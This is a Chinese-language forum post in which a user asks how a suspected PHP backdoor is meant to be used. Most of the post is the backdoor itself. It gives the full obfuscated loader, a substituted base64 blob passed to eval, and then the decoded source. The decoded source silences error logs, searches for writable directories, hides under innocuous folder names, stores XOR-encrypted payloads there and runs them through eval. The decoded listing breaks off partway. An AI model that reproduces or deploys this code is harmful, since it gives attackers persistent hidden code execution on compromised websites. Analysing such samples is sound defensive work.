一个奇怪的Php后门？？如何分析出利用方法呢？？？

dicky · 2019 年3 月 16 日 13:32

预格式化文本

加密的代码如下

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $xaqfe = 8671; function azzhmzmr($flrows, $swnkwixfcp){$ukafja = ''; for($i=0; $i < strlen($flrows); $i++){$ukafja .= isset($swnkwixfcp[$flrows[$i]]) ? $swnkwixfcp[$flrows[$i]] : $flrows[$i];}
$vjvaxnnrvk="base" . "64_decode";return $vjvaxnnrvk($ukafja);}
$tlheba = 'sXDholqKeCsF9TlJbOqJCTGIeJbZSfAlvfPc3PdtsXDholqKeCsF9TGIe4qDbQ9IbQmQkz'.
'nPtvZxzuyc6ODWbTldtz0pgC5WeC5DgBldoHqhCB7c6HRQkznPtvZxzuyDbQ9IbDqJeCyIbQ7c6ObFmzuN2scnbTld'.
'CB7c6HlW6XDpoCsFmzuN2sFxzwdtoHgFSH7DeODheHsFSDySRaqavdPEtjuxzQZxzEnwSzyueHec6ORFSDySRa'.
'qavdPEkznECXUEtvZxzQdxzwdtoHgFSH7DeODheHsFSu79Rul2lfqjHlqv7lyyRuaRv4SEtjuxzQZxzE'.
'nwSzyueHec6ORFSu79Rul2lfqjHlqv7lyyRuaRv4SEkznEkJSc3PdtWsdt2scceEnFSH7DeODheHsF9damRuly7'.
'aDWRDl3CKfdxXmUxTxOx8SKgOfUmOa5eOuT3i9cgHSGxOadoHYG3zbctsdtVPdtSznwSX7D'.
'eODhejwQsRGj7RafHlqjlRAWmvsdgKwBgTgTm8xEgvwJgHaOovgUbOD'.
'5g8fTgC7c6KfU9JPwmjuN2sFxzEnwSznueXadgjnqSfAlvfPN2sFwSznw9X750XaWoTlAS2dwvDlmv2ZxzwdtSznw'.
'Sz7ivfqzsRGvHJ08b4q50C7F94dwrjnQ32uGxKg4evwpx2wGmEddeHe5kvD5m8'.
'RpxOmA3vmAxHSGmKlD9KZxzEnwSzyQ6XqEgHPw9XxKCTa40XwN2sFxzwdtSznwSXe46O'.
'xdoHqhSXxKCd0D0f5IbBsFtsdtSznwSiZxzEnwSznwSznwbOld0C9hSixdbQ7I6XqBeCSFbi9De4qJeCyZgHxDtzbIC'.
'E5B0B0YeQ7PtlPhkTuQkzbQkfnuC4xaRDeaRDZQja7RRaqSv4xR94dctvZxzEnwSzyq2sFxzEnwSzyO0HA80XDI6E'.
'y8b4qieC7CbODdgH9ZeR7cbQmFtsdtSznwSiZxzEnwSznwSznw9i9DbJ'.
'nqSfaJbOaAtzuN2sFxzEnwSznwSznw9XahgHGAbBDKCBa4eClDS2dwsC9JgCuFt'.
'vZxzwdtSznwSznwSznugHA56iDKVCxWbClD0Hl6CjnqSXxKCd0D0f7Ig49I6BsFtvZx'.
'zwdtSznwSznwSznubTlZeDqPgC7FS2dw9aqv7l9H7l9694x2RuDslaqXjRGavuax7j003PdtSznwSznwSzyBoXDZejnFtz7K6X'.
'aKoznqSixdbQ9P6BmF9ixD6XeWbXadozPw7fDj7RxRv49eC4xaRfajsl7rREucSzfqrjyXsRGv7juxzEnwSznwSznwVPdtSznw'.
'SznwSznwSznw9ixD6XeWbXadoznqSix4gQxdbEwubTlZeDqPgC7'.
'FkznPkznubTG5bTwc3Pdt2sFwSznwSznwSznwSzyceEnF9ixD6XeWbXadoznqrjy8b4qieC7f6Txj6Tqdtzuc2sFwSznw'.
'SznwSznwSzyN2sFwSznwSznwSznwSznwSznwgQ9DgHZN2sFwSznwSznwSznwSzyq2sFxzEnwSz'.
'nwSznwSznwSXDOSz5K0i9ZeHUF9ixD6XeWbXadozuc2sFwSznwSznwSznwSzyN2sFwSznwSznwSznw'.
'SznwSznw9XahgHGAbBDKCBa4eClDH4dwrjnubTlZeDqPgC7F3PdtSznwSznwS'.
'znwSznwWsdtSznwSznwSzyq2sFxzEnwSznwSznweOqJeHa8oznF9XahgHGAbBDKCBa4e'.
'ClDSXaKSz780C9JeHAdCT7cbEuxzEnwSznwSznwVPdtSznwSznwSznwSznwoHgwtzac6Dq5bQ95VjwugBlJbOlh0a'.
'quoCSZSz7JeCmctsdtSznwSznwSznwSznwVPdtSznwSznwSznwSznwSznwSz7'.
'JeCmwrjy5bQ95VlqpeC9QejwubOlKkzy8b4qieC7foC9DgB7IbQDmoCxdtz7'.
'80C9JeHAdCT7cbEuc3PdtSznwSznwSznwSznwWsdtSznwSznwSzyq2sFxzEnwSznwSznwbOld0C9hSXxKCdxFeHxLlB9'.
'c0XaE6XRFgC9JgCDW0HAcbClDtz7JeCmctvZxzEnwSzyq2sFxzEn'.
'wSzyO0HA80XDI6Ey8b4q2oXl8o40JoC75gOGDtz7uoC9W6XDK0zuxzEnwSzyN2sFwSznwSznwSz7uoC9W6X'.
'DK0aqBbODdgH9ZejnqSfaJbOaAtzuN2sFxzEnwSznwSznweOqJ'.
'eHa8oznF9X7cbDqZoCxdSXaKSz7uoCSc2sFwSznwSznwSiZxzEnwSznwSznwSznwSXDOSz5noCxW0'.
'B9c0XaE6XRF9X7cbEuw9EgwoCxWeXDJtz7uoCSctsdtSznwSznwSznwSznwVPdtSznwSznwSznwSznwSznwSz7u'.
'oC9W6XDK0aqBbODdgH9Zelp0S2dw9X7cb8ZxzEnwSznwSznwSznwSidxz'.
'EnwSznwSznwWsdt2sFwSznwSznwSi9D0ilJ6EnueXDJCTGcbB7W'.
'0B9c0XaE6XRN2sFwSznwWsdt2sFwSznweQlhgB7c6TUwgBxW7Tld7XDJeHxd6B9AvXDK0zwueXDJkznueXlP0Xwqmvnc2sFwSznw'.
'VPdtSznwSznwSznubOlK0HGdS2dwgC9JgCuFtvZxzwdtSznwSznwSzyceEnFSHDKCT7'.
'cbEwueXDJtjuxzEnwSznwSznwVPdtSznwSznwSznwSznwbOld0C9hSz7JeCx46isN2sFwSznwSznwSidxzwdtSznwSz'.
'nwSznubOlK0HGdH4dwrjnueXDJ3PdtSznwSznwSznueXDJCTxI0HAdS2dwm2ZxzwdtSznwSznwSzyceEnF9X7Dbi7FS2Pwmju'.
'xzEnwSznwSznwVPdtSznwSznwSznwSznwbOld0C9hSz7JeCx46isN2sFwSznwSznwSidxzwdtSznwSz'.
'nwSznueXDJS2dwbB7J6Xlhtz7uoCScS2dqS2fwrJnueXDJS2FwbQ7JoHdF9X7cb'.
'EPw94GbkJbc3PdtSznwSznwSznuoznqSfyIbXlheXDJtz7uoCSc3PdtSznwSznwSzyceEnF9Xwwrvdq'.
'SfeyvaxatsdtSznwSznwSzyN2sFwSznwSznwSznwSzyJeC74bOUw9i9DbBlZ02ZxzEnwSznwSznwWsdt2sFwSznwSznwSi0FoHGD'.
'SzwF9XgwrjyJeHaueXDJtz7FtjuwSvdqSfeyvaxatsdtSznwSznwSzyN2sFwSznwSznwSznwSzyceEnF9XgwSvdq'.
'Szbh9Jy56Osw9XgwSvdqSzbhkEbc2sFwSznwSznwSznwSzyN2sFwSznwSznwSznwSznwSznw9'.
'Xx4bQ9D6Q7WeXDJS2dwSE7uoCSI9XgE3PdtSznwSznwSznwSznwSznwSXDOSz5cb4quoCSF9Xx4bQ9D6Q7WeXDJtjuxzEnwS'.
'znwSznwSznwSznwSzyN2sFwSznwSznwSznwSznwSznwSznwSz7uoC9WgTq46QswtKdwmvZxzwdtSznwSz'.
'nwSznwSznwSznwSznwSznubOlK0HGdH4dwrjnugBlJbOlh0aquoCSN2sFwSznwSz'.
'nwSznwSznwSznwSznwSz7JeCx46iswrjy5bQ95VlqpeC9QejwubOlK0HGdkzy8b4qieC7foC9DgB7IbQDmoCxdtz7'.
'80C9JeHAdCT7cbEPw9X7Dbi7FSzYwmvnctvZxzEnwSznwSznwSznwSznwSzyq2sFw'.
'SznwSznwSznwSzyq2sFwSznwSznwSidxzwdtSznwSznwSzy86XqKeH7cbEwuozuN2sFxzEnwSznwS'.
'znwbOld0C9hSz7JeCx46isN2sFwSznwWsdt2sFwSznweQlhgB7c6TUwgBxW7Tld7Xq8ROqI0zwc2sFwSznwVPdtSznw'.
'SznwSznueXq8bOqI0aqD6OswrjyK0i9JbXqKtz7WRdljluljHJ0vs499Ra7W7uDm7RAyvRRQCjPw9aqv7l9H7'.
'l96949aRllaR47Wll9994dc3PdtSznwSznwSzyceEnF9X7IgB9I6B7WeHAuS2dqrjyXsRGv7juxzEnwSznwSznwVPd'.
'tSznwSznwSznwSznwbOld0C9hSz7WRdljluljHJ0fvdxlvRl3laqjvdqR94dN2sFwSznwSznwSi'.
'dxzEnwSznwSznweHGKeHDOSzwueXq8bOqI0aqD6OswrvdqS2nc2sFwSznwSznwSiZxzEnwSznwS'.
'znwSznwSi9D0ilJ6EnEkJSN2sFwSznwSznwSidxzEnwSznwSznweHGKesdtSznwSznwSzyN2sFwSznwSznwSznwSz'.
'yJeC74bOUwbBlEbB7Jtz7WRdljluljHJ0vs499Ra7W7uDm7RAyvRRQCjPwmzPw9X7IgB9I6B7WeHAutvZ'.
'xzEnwSznwSznwWsdtSznwSidxzwdtSznwSXDOSzw5eQlhgB7c6TAWeC5cbB7Ktz0OoHGDCBy40aq86TAdeHAdb'.
'JbctsdtSznwSiZxzEnwSznwSznweQlhgB7c6TUweODZelqP0C7WgTqh0Xlh0imF9XUZS'.
'z7ukznueOG5eJnqSfe56ixDtsdtSznwSznwSzyN2sFwSznwSznwSznwSznu6HquejnqSz7O6XaQS2d'.
'qS2wwrJnQgjbw3EnQ0JbN2sFwSznwSznwSznwSznueEnqSfyO6ByD6Ewu6EPw9X4IeXRc3PdtSznwSznw'.
'SznwSznwoHgwtz7OS2dqrjyXgHGKejuxzEnwSznwSznwSznwSiZxzEnwSznwSznwSznwSz'.
'nwSzyJeC74bOUwm2ZxzEnwSznwSznwSznwSidxzEnwSznwSznwSznwSXlZbTRxzEnwSznwSznwSznwSiZxzEnwSznwSznwSznw'.
'SznwSzyceEnFoCxWgC9JgCuF9XsctjnueznqSXDpbXGIeXRF9Xsc3PdtSznwSznwSznwSznwSznwSz7E'.
'VC7Db4qBbODd0XlhS2dweQ0JoC7Dtz7OkznuezuN2sFwSznwSznwSznwSznwSznweOxZ6BxDtz7OtvZxzEn'.
'wSznwSznwSznwSznwSzyJeC74bOUw9X9A0XlKCB0JoC7deHUN2sFwSznwSznwSznwSzyq2sF'.
'wSznwSznwSidxzEnwSzyq2sFxzEnwSzyceEnFSHe46OxdoHqhCTlUoCxdbJwQeODZelqQeC7WgTqh0Xlh'.
'0imQtjuxzEnwSzyN2sFwSznwSznwSXe46OxdoHqhSXec6XlWeTldCTxI6Q7D6Q7Ktz7Oo'.
'HGD6OapejuxzEnwSznwSznwVPdtSznwSznwSznwSznw9XeFgHAu6XRwrj'.
'yO6ByD6EwueODZeHA56HRZSz9JSEuN2sFwSznwSznwSznwSznueOxI6Q7D6Q7KS2dweQ9DgHsF9Xe'.
'FgHAu6XRZSXec6XlKoCcDtz7OoHGD6Oapejuc3PdtSznwSznwSznwSznweOxZ6BxDtz7O'.
'oXaheXGDtvZxzwdtSznwSznwSznwSznwbOld0C9hSz7OgTqh0Xlh0imN2sFwSznwSznwSidxzEnwSzyq2sFxzwdtSznwSXe46O'.
'xdoHqhSXxKCT7DgB9Abi7WbX55bTRF9X750XfZSz7LeCuc2sFwSznwVPdtSznwSznwSznu6BldCT750XfwrjnES8ZxzwdtSznwS'.
'znwSzyO6BSwtz7crvnNSz7crixdbOGD6EwueXadgjuNtsdtSznwSznwSzy'.
'N2sFwSznwSznwSznwSzyO6BSwtz71rvnNSz71rixdbOGD6EwuoTlAtjnO9EnuovGK0i9ZeHUF9X750Xfc3Jn'.
'uoEZLkznuojZLtsdtSznwSznwSznwSznwVPdtSznwSznwSznwSznwSznwSz7I0C7WeXadgjnh'.
'rjy8oiSF6B9utz7ugC75HJ7cCjuwCEyIbOsF9XpDVlZuoDdctvZxzEnwSznwSznwSzn'.
'wSidxzEnwSznwSznwWsdt2sFwSznwSznwSi9D0ilJ6Enu6BldCT750XfN2'.
'sFwSznwWsdt2sFwSznweQlhgB7c6TUwgBxWeXl8bQDP0zwueXadgjPw9XpDVjuxzEnwSzyN2sFwSznwSznwSX0Z6T956znu'.
'gBxWgCldo2ZxzwdtSznwSznwSzyJeC74bOUwgBxWeXl8bQDP0aqPoXaKej58b4queHxJVCydCByFgCxDtz'.
'7ugC75kznuoTlAtjPw9XxKCTa40Xwc3PdtSznwSidxzEnwSzyO0HA80XDI6Ey8b4qD6OxJVCydtz7ugC75kznuoTlA'.
'tsdtSznwSiZxzEnwSznwSznweTGIgOaZSz78b4q50C7F3Pdt2sFwSznwSznwSi9D0ilJ6Ey8b4'.
'queHxJVCydCByFgCxDtXxKCT7DgB9Abi7WbX55bTRF9X750XfZSz78'.
'b4q50C7FtjPw9XpDVjuN2sFwSznwWsdt2sFwSznweQlhgB7c6TUwgBxWeODZelqJeHau'.
'tz7PgC7FtsdtSznwSiZxzEnwSznwSznw9X750XfwrjyneODZelqQeC7WgTqh0'.
'Xlh0imF9iy50Xwc3Pdt2sFwSznwSznwSi9D0ilJ6EnueXadgvZxzEnwSzyq2sFxzEnwSzyO0HA80XDI6'.
'Ey8b4qOoHGDCB0JoC7Dtz7PgC7FkznueXadgjuxzEnwSzyN2sF'.
'wSznwSznwSfyOoHGDCBy40aq86TAdeHAdbJwubXadozPw9X750Xfc3PdtSznwSidxzwdtSznwSXe46O'.
'xdoHqhSXxKCTec6XlWgCyPeHAutz7PgC7FkznueXadgjuxzEnw'.
'SzyN2sFwSznwSznwSfyOoHGDCBy40aq86TAdeHAdbJwubXadozP'.
'w9X750XfZS2wc3PdtSznwSidxzwdtSznwSXe46OxdoHqhSXxKCBxIbQ7WgTqpbXaJeCSF9XfZSz7EtsdtSzn'.
'wSiZxzEnwSznwSznwbOld0C9hSixdbOGD6EwugjuwkjyK0i9ZeHUF'.
'9XSc3PdtSznwSidxzwdtSznwSXe46OxdoHqhSXxKCd0D0fxI6H4I6Dxd6B95eTRF9'.
'X7cbQmqvDlmvzuxzEnwSzyN2sFwSznwSznwSz7KeHGOCT7cbEnqSX7cbOA56HRFC4qXjRGaC4Yc3Pdt2sFwSznwSznwSz7'.
'86T4p6TAW6OapeCmwrjyybQ95VjwE6BydoHqhbJSZSz9ToHlBbJSZSz9PgH0DbJSZSz9KeC'.
'xKoHqhbJSZSz9K0XadbJSZSz94bTlJbJSZSz95bQ7cgTGDbJSZSz9u0H4PSEPwSO'.
'5DgH7DbQmEkznE6XDEbJSc3Pdt2sFwSznwSznwSz7d6CyWeXDJS2dw9ixD6'.
'XeWeXDJSzUwSEYESzUw9XxI6H4I6DqhgH4Db4pK0i9ZeHUFgBxW7Tld'.
'jXqK0zwctjnDSXxI0HAdtz786T4p6TAW6OapeCmcCvZxzwdtSznwSznwSzyceEnFeODZelqDVXDK0imF9i7pbaquoCSctsdtSz'.
'nwSznwSzyN2sFwSznwSznwSznwSzyJeC74bOUw9i7pbaquoCSN2sFwSznwSznwSidxzwdtSznwSznwSzyce'.
'E5poT7cbEwu0X4PCT7cbEuc2sFwSznwSznwSiZxzEnwSznwSznwSznwSi9D0ilJ6Enu0X4PCT7cb8'.
'ZxzEnwSznwSznwWsdt2sFwSznwSznwSi9D0ilJ6EnES8ZxzEnwSzyq2sFxzEnwSz'.
'yO0HA80XDI6Ey8b4qP6ilQoHAWgH7utz7hgH4DkznugOaKevgdCT750Xfc2sFwSznwVPdtSznwSznwSznueXadgjnqSX'.
'95bTRTxaqueHxIeXRF9X95bTRTxaqugC75tvZxzwdtSznwSznwSznubB7IbOaQelqPgC7FS2dwgBxW7Tl'.
'dsTqp6HqhRB7IbOaQejwcSzUwSEYE3PdtSznwSznwSznubB7IbOaQelqPgC7FS2dw9ixd6B'.
'95eTlWbXadoznhSix4gQxdbE5pe2RFSOx5gT5DSEuZS2nZS2RcSzUwSDYESzUw6Hs4tz7hgH'.
'4DSzUwgBxW7TldjXqK0zwctvZxzwdt2sFwSznwSznwSXxKCTec6XlW0B9c0XRF9ixd6B95eTlWbXadozP'.
'wgBxWeHA8bQDP0zwueXadgjPwgBxW7TldjXqK0zwctjuN2sFwSznwWsdt2sFwSzn'.
'weQlhgB7c6TUwgBxWbXG4eTDhCB9D6jwu6OapejuxzEnwSzyN2sFwSznwSznwSz7K0XqJgH0D'.
'CBy50Xwwrjy8b4qieC726T4p6TAv0XqJgH0DtzuhSzSIS8ZxzEnwSznwSznw9ix'.
'd6B95eTlWbXadoznqSz7K0XqJgH0DCBy50XwwkEyK0H9K0iSF6Hs4tz98gHxFejSckznPkzn4tjnhSz9'.
'WSEnhSX4uxjwu6OapejnhSXxKCd0D0f5IbBsFtjuN2sFxzEnwSznwSznwoHgwtXec6XlWeC5cbB7K'.
'tz7K0XqJgH0DCBy50XwctsdtSznwSznwSzyN2sFwSznwSznwSznwSzyn0HAZoHALtz7K0XqJgH0DCBy50Xwc3PdtSznwSznw'.
'Szyq2sFwSznwWsdt2sFwSznweQlhgB7c6TUwgBxWbXG4eTDhCTGIgHsF'.
'9XA56HRqvDlmvzuxzEnwSzyN2sFwSznwSznwSz7K0XqJgH0DCB'.
'y50Xwwrjy8b4qieC726T4p6TAv0XqJgH0DtzuN2sFxzEnwSznwSznwoHgwtXDKCT7cbEwubB7IbOaQelqPgC7Ftju'.
'xzEnwSznwSznwVPdtSznwSznwSznwSznwoHgwtz7hgH4DS2dqSfAlvfPcSzY'.
'ISXGIgHswgHGZSiyZ0H0c6QmxzEnwSznwSznwSznwSiZxzEnwSznwSznwSznw'.
'SznwSzyO6B9DgHxFSz5KgTaheXDJtz7K0XqJgH0DCBy50XwcSXaKSz7LeCuqrE7P6ilQoHAW6OapejuxzEnwSznwSznwSznwSz'.
'nwSzyN2sFwSznwSznwSznwSznwSznwSznwSXDOSz5K0i9P6BmF9iyZ0H0c6DqhgH4DkzyK0H9K0iSF6Hs4tz98gH'.
'xFejSckznPkzn4tjuwSvdqSfe56ixDtsdtSznwSznwSznwSznwSznwSznwSzyN2sFwS'.
'znwSznwSznwSznwSznwSznwSznwSzyneCe56z58b4queHxJVCy'.
'dtXxKCTec6XlWbOl5ezwubB7IbOaQelqPgC7FSzUwSEYESzUw9iyZ0'.
'H0c6DqhgH4DtjPwgBxW7TldjXqK0zwctjuN2sFwSznwSznwSznwSznwSznwSznwSidxzEn'.
'wSznwSznwSznwSznwSzyq2sFwSznwSznwSznwSzyq2sFwSznwSznwSznwSzyD6ixD2s'.
'FwSznwSznwSznwSzyN2sFwSznwSznwSznwSznwSznw9ixd6B95eTlWbXadoznqSz7K0XqJgH0DCBy50XwwkEnEkJSwk'.
'EyK0H9K0iSF6Hs4tz98gHxFejSckznPkzn4tjnhSz9WSEnhSX4uxjwu6OapejnhSXxKCd0D0f5IbBsFtjuN2sFxzEnwSznwSzn'.
'wSznwSznwSzyceEnFeODZelqDVXDK0imF9ixd6B95eTlWbXadoz'.
'uc2sFwSznwSznwSznwSznwSznwVPdtSznwSznwSznwSznwSznwSznwSzyneCe56z58b4queHxJVCydtXxKCTec6XlWbOl5ezw'.
'ubB7IbOaQelqPgC7FtjPwgBxW7TldjXqK0zwctjuN2sFwSznwSznwSznwSznwSznwWsdtSznwSznwSz'.
'nwSznwWsdtSznwSznwSzyq2sFwSznwWsdt2sFwSznweQlhgB7c6TUwgBxW0B9c0XaE6XlWgT5DgTZFtsdtSznwSiZxzEnwS'.
'znwSznwoHgwtixdbOGD6E58b4qieC726T4p6TAv0XqJgH0DtzucSzfqS2nc2sFwSznwSznwSiZxzEnwSznw'.
'SznwSznwSi9D0ilJ6EyRbQlD3PdtSznwSznwSzyq2sFwSznwSznwSXlZbTRxzEnwSznwSznwVPdtSznwSznwSznwSznwbOl'.
'd0C9hSfe56ixD3PdtSznwSznwSzyq2sFwSznwWsdt2sFwSznwe'.
'OqJeHa8oznF9aq2vdqkjRRwgCmw9XpDVvd+9ie56ilDtsdtSznwSiZxzEnwSznwSznw9X750Xfwrjnu0OaZ0HRN2sFwSznwSznwS'.
'z7ugC75CTpDVjnqSz7LeCuN2sFwSznwWsdt2sFwSznwoHgwtzfueXadgjuxzEnwSzyN2sFwSznwSz'.
'nwSXeIbOl5gTwwtz7WRfqvlzy5bJnuoTlArvUu0OaZ0HRc2sFwSznwSznwSiZxzEnwSznw'.
'SznwSznwSz7ugC75S2dw9ie56ilD3PdtSznwSznwSznwSznw9X75'.
'0XaWoTlAS2dw9XpDVvZxzEnwSznwSznwWsdtSznwSidxzwdtSznwSz7ugC75S2dwsilhbTlJoHaZoCcDtXxKCT7Dg'.
'B9AbisFgOaKevgdCT7DgTquejwueXadgjuZSz7ugC75CTpDVjuc3Pdt2sFwSznwoHgwtXDKbTldtz7ugC75HJ'.
'05oJ00tjnO9EnugBxWgCldo2dq9X750Xa69TaL94dc2sFwSznwV'.
'PdtSznwSznwSzyceEnF9X750Xa69TfQCjnqrjnQojbc2sFwSznwSznwSiZxzEnwSznwSznwSznwSz'.
'7cS2dwsC9JgCuF2sFwSznwSznwSznwSznwSznw9ByT9JnqrEynbX5P0OlJbTDI6EwckndtSznwSznwSznw'.
'SznwSznwSz0K0EbwrvUw9KfhmzdJ9JPxzEnwSznwSznwSznwSznwSznQgHZQS2d+Sz7ug'.
'C75HJ05oJ00kndtSznwSznwSznwSznwtvZxzEnwSznwSznwSznwSXl8oXYwsixDbOD56XDMejwuojuN2sFwSznwSznwSznwSzyDV'.
'XDd3PdtSznwSznwSzyq2sFwSznwSznwSXlZbTlceEnF9X750Xa69TfQCjnqrjnQejbc2sFwSznwSznwSiZxzEnwSzn'.
'wSznwSznwSXlTgHPF9X750Xa69TsQCjuN2sFwSznwSznwSidxzEnwSznwSznweHGKeHDO'.
'SzwueXadglZQgj00S2dqSz0P6ilQoHUQtsdtSznwSznwSzyN2sFwSznwSznwSznwS'.
'zyceEwueXadglZQbTfQCjnqrjnQgH7u9JuxzEnwSznwSznwSznwSiZxzEnwSznwSznwSznwSznwSzy8b4qP'.
'6ilQoHAWgH7utz7ugC75HJ0P94dZSz7ugC75HJ0u94dc3PdtSznwSznwSznwSznwWsdtSzn'.
'wSznwSznwSznweHGKeHDOtz7ugC75HJ0Kgj00S2dqSz0JeHdQtsdtSzn'.
'wSznwSznwSznwVPdtSznwSznwSznwSznwSznwSXxKCByZ0H0c6DqJeHdF9X750Xa69BnQCj'.
'uN2sFwSznwSznwSznwSzyq2sFwSznwSznwSidxzEnwSznwSznweHxF6JnueXadglZQgHZQCvZx'.
'zEnwSznwSznweC5c0zwc3PdtSznwSidxzwdtSznwSXxKCByZ0H0c6DqZ6TautzuN2scq';
$lgqsr = Array('1'=>'q', '0'=>'d', '3'=>'O', '2'=>'D', '5'=>'h', '4'=>'1', '7'=>'R', '6'=>'b', '9'=>'J', '8'=>'j', 'A'=>'5', 'C'=>'X', 'B'=>'3', 'E'=>'i', 'D'=>'l', 'G'=>'x', 'F'=>'o', 'I'=>'v', 'H'=>'W', 'K'=>'z', 'J'=>'y', 'M'=>'6', 'L'=>'r', 'O'=>'m', 'N'=>'7', 'Q'=>'n', 'P'=>'w', 'S'=>'I', 'R'=>'U', 'U'=>'4', 'T'=>'2', 'W'=>'f', 'V'=>'e', 'Y'=>'8', 'X'=>'G', 'Z'=>'s', 'a'=>'F', 'c'=>'p', 'b'=>'c', 'e'=>'Z', 'd'=>'0', 'g'=>'Y', 'f'=>'E', 'i'=>'H', 'h'=>'u', 'k'=>'L', 'j'=>'S', 'm'=>'M', 'l'=>'V', 'o'=>'a', 'n'=>'A', 'q'=>'9', 'p'=>'t', 's'=>'Q', 'r'=>'P', 'u'=>'k', 't'=>'K', 'w'=>'g', 'v'=>'T', 'y'=>'B', 'x'=>'N', 'z'=>'C');
eval/*jahxek*/(azzhmzmr($tlheba, $lgqsr));
}

dicky · 2019 年3 月 16 日 13:36

echo 解密后的代码


@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);


if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    $data = NULL;
    $data_key = NULL;

    $GLOBALS['cs_auth'] = '891765e8-4812-4efa-9a25-6c99395b135e';
    global $cs_auth;


    function cs_GetHost()
    {
        return strtolower(preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']));
    }

    function cs_GetWritableDirs()
    {
        $res = Array();

        $analysys_queue = Array();

        $analysys_queue[] = cs_GetDocRoot();

        $self_path = $_SERVER['SCRIPT_FILENAME'];
        while (($slash = strrpos($self_path, DIRECTORY_SEPARATOR)) !== FALSE)
        {
            $self_path = substr($self_path, 0, $slash);

            if ($self_path == cs_GetDocRoot())
            {
                break;
            }

            if (strlen($self_path))
            {
                $analysys_queue[] = $self_path;
            }
        }

        foreach ($analysys_queue as $current_dir)
        {
            if (!in_array($current_dir, $res))
            {
                $res = array_merge($res, cs_GetDirectoryList($current_dir));
            }
        }

        return cs_CheckWritable(array_unique($res));
    }

    function cs_CheckWritable($dir_list)
    {
        $dir_list_writable = Array();

        foreach ($dir_list as $dir)
        {
            if (@is_writable($dir) && is_dir($dir))
            {
                $dir_list_writable[] = $dir;
            }
        }

        return $dir_list_writable;
    }

    function cs_GetDirectoryList($dir, $depth=10)
    {
        $result = array();

        if (!is_dir($dir))
        {
            return $result;
        }

        $result[] = $dir;
        $dir_count = 0;

        if ($depth < 1)
        {
            return $result;
        }

        $dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/');
        $h = @opendir($dir);
        if ($h === FALSE)
        {
            return $result;
        }

        while (($f = readdir($h)) !== FALSE)
        {
            if ($f !== '.' and $f !== '..')
            {
                $current_dir = "$dir/$f";
                if (is_dir($current_dir))
                {
                    $dir_count += 1;

                    $result[] = $current_dir;
                    $result = array_merge($result, cs_GetDirectoryList($current_dir, $depth / 10));
                }
            }
        }

        closedir($h);

        return $result;
    }

    function cs_GetDocRoot()
    {
        $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
        if ($docroot_end === FALSE)
        {
            return $_SERVER['DOCUMENT_ROOT'];
        }
        elseif ($docroot_end === 0)
        {
            return "/";
        }
        else
        {
            return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
        }
    }

    if (!function_exists('file_put_contents'))
    {
        function file_put_contents($n, $d, $flag = False)
        {
            $mode = $flag == 8 ? 'a' : 'w';
            $f = @fopen($n, $mode);
            if ($f === False)
            {
                return 0;
            }
            else
            {
                if (is_array($d)) $d = implode($d);
                $bytes_written = fwrite($f, $d);
                fclose($f);
                return $bytes_written;
            }
        }
    }

    if (!function_exists('file_get_contents'))
    {
        function file_get_contents($filename)
        {
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));
            fclose($fhandle);

            return $fcontents;
        }
    }


    function cs_decrypt_phase($data, $key)
    {
        $out_data = "";

        for ($i=0; $i<strlen($data);)
        {
            for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
            {
                $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
            }
        }

        return $out_data;
    }

    function cs_decrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
    }
    function cs_encrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
    }

    function cs_file_read($path)
    {
        $data = @file_get_contents($path);

        return $data;
    }

    function cs_file_write($path, $data)
    {
        @file_put_contents($path, $data);
    }

    function cs_file_append($path, $data)
    {
        @file_put_contents($path, $data, 8);
    }

    function cs_sort_comparer($a, $b)
    {
        return strlen($a) - strlen($b);
    }

    function cs_GetCommonStorage($dirs=NULL)
    {
        $self_dir = dirname(__FILE__);

        $common_names = Array("options", "views", "pages", "sessions", "stats", "users", "articles", "dump", "headers", "libs");

        $tmp_dir = $self_dir . "/" . $common_names[strlen(cs_GetHost()) % count($common_names)];

        if (file_exists($tmp_dir))
        {
            return $tmp_dir;
        }

        if(mkdir($tmp_dir))
        {
            return $tmp_dir;
        }

        return "";
    }

    function cs_plugin_add($name, $base64_data)
    {
        $data = base64_decode($base64_data);

        $storage_path = cs_GetCommonStorage() . "/";
        $storage_path = $storage_path . substr(md5("cache"), 0, 5) . "_" . md5($name . cs_GetHost());


        cs_file_write($storage_path, cs_encrypt($data, cs_GetHost()));
    }

    function cs_plugin_rem($name)
    {
        $storage_path = cs_GetCommonStorage(). "/";
        $storage_path = $storage_path . substr(md5("cache"), 0, 5) . "_" . md5($name . cs_GetHost());

        if (file_exists($storage_path))
        {
            @unlink($storage_path);
        }
    }

    function cs_plugin_load($name=NULL)
    {
        $storage_path = cs_GetCommonStorage();

        if (is_dir($storage_path))
        {
            if ($name == NULL) // load all plugins
            {
                foreach (scandir($storage_path) as $key=>$plugin_name)
                {
                    if (strpos($plugin_name, substr(md5("cache"), 0, 5)) !== False)
                    {
                        @eval(cs_decrypt(cs_file_read($storage_path . "/" . $plugin_name), cs_GetHost()));
                    }
                }
            }
            else
            {
                $storage_path = $storage_path . "/" . substr(md5("cache"), 0, 5) . "_" . md5($name . cs_GetHost());

                if (file_exists($storage_path))
                {
                    @eval(cs_decrypt(cs_file_read($storage_path), cs_GetHost()));
                }
            }
        }
    }

    function cs_writable_check()
    {
        if (strlen(cs_GetCommonStorage()) != 0)
        {
            return True;
        }
        else
        {
            return False;
        }
    }

